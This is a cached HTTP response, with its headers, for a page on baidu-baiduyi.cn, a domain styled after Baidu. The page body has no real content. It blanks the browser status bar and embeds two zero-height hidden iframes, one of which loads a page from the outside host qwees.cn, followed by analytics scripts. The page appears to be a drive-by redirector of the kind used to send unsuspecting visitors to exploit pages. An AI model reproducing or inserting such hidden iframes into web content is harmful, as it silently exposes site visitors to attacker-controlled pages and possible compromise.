HTTP/1.1 200 OK
Content-Length: 533
ETag: "08dde749e92c91:5af"
Date: Mon, 23 Feb 2009 02:18:05 GMT
Last-Modified: Thu, 19 Feb 2009 14:29:22 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://baidu-baiduyi.cn/a0158353/a15.htm
X-Polipo-Date: Mon, 23 Feb 2009 02:39:51 GMT
X-Polipo-Access: Mon, 23 Feb 2009 03:45:09 GMT

<SCRIPT>window.defaultStatus=".";</SCRIPT>
<iframe src=new.html  height=0  width=100 ></iframe>
<BR>
</BR>
<BR>
</BR>
<iframe src=http://qwees.cn/tj/a15.htm  height=0  width=100 ></iframe>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/859818/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/859818/ystat.gif"/></a></noscript>

<script src="http://s23.cnzz.com/stat.php?id=1139018&web_id=1139018" language="JavaScript" charset="gb2312"></script>
